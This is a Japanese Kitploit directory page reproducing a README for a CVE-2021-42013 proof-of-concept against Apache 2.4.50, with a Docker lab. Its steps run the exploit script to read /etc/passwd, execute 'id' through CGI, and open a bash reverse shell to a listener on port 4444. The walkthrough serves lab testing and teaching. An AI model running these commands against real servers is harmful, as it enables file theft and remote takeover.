Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-42013 — Apache 2.4.50 のパストラバーサルおよびリモートコード実行 (CVE-2021-42013) に対する概念実証エクスプロイトで、Docker ラボとリバースシェルペイロードを備え、許可されたセキュリティテスト向け。 | Kitploit
ツール/GitHubGitHub/asepsaepdin/cve-2021-42013
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツールラボと実践
GitHubasepsaepdin/cve-2021-42013

CVE-2021-42013

Apache 2.4.50 のパストラバーサルおよびリモートコード実行 (CVE-2021-42013) に対する概念実証エクスプロイトで、Docker ラボとリバースシェルペイロードを備え、許可されたセキュリティテスト向け。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-42013 - Apache 2.4.50 パストラバーサル & リモートコード実行 (RCE)


⚠️ 教育および許可されたセキュリティ研究目的のみ

元のエクスプロイト作成者

元のPoC作成者であるWalnut Security Services Pvt. Ltdに深く感謝します。

説明

攻撃者はパストラバーサル攻撃を使用して、Aliasのようなディレクティブで設定されたディレクトリ外のファイルにURLをマッピングする可能性があります。これらのディレクトリ外のファイルが通常のデフォルト設定「require all denied」で保護されていない場合、これらのリクエストは成功する可能性があります。また、これらのエイリアスされたパスでCGIスクリプトが有効になっている場合、リモートコード実行が可能になる可能性があります。この問題は、Apache 2.4.49およびApache 2.4.50にのみ影響し、以前のバージョンには影響しません。


手順ガイド

  1. まず、リポジトリをクローンします

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2021-42013.git
    
  2. ディレクトリを変更します

    root@kitploit:~
    cd CVE-2021-42013
    
  3. 脆弱性コンテナをビルドします

    root@kitploit:~
    docker build -t CVE-2021-42013 .
    
  4. 一時的なコンテナを実行します

    root@kitploit:~
    docker run --rm -it --name CVE-2021-42013 CVE-2021-42013
    
  5. コンテナのIPアドレスを確認します

    root@kitploit:~
    docker inspect CVE-2021-42013 | grep "IPAddress"
    
  6. スクリプトに実行権限を付与します

    root@kitploit:~
    chmod +x cve-2021-42013.sh
    
  7. パストラバーサルをテストして確認するには、有効なディレクトリを見つける必要があります。この場合、/iconsが設定されています。次のコマンドを実行すると、パストラバーサルの脆弱性がトリガーされ、/etc/passwdの内容が出力されます。

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3/icons /etc/passwd
    
  8. リモートコード実行をテストして確認するには、CGIが設定され有効になっている必要があります(このケースでは有効です)。次のコマンドを実行すると、リモートコード実行がトリガーされ、idコマンドの出力が表示されます。

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3 /bin/bash id
    
  9. 攻撃者の視点から見ると、リモートコード実行はインタラクティブシェルへのアクセスを得るために重要です。次のコマンドを実行すると、bashベースの従来のTCPリバースシェルが攻撃者のシステムのポート4444/tcpにトリガーされます。

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.4 /bin/bash 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'
    
    root@kitploit:~
    nc -nlvp 4444
    

クレジット

  • https://github.com/walnutsecurity/cve-2021-42013
  • https://nvd.nist.gov/vuln/detail/CVE-2021-42013
  • https://www.exploit-db.com/docs/50552
  • https://www.exploit-db.com/exploits/50406
ツールをダウンロード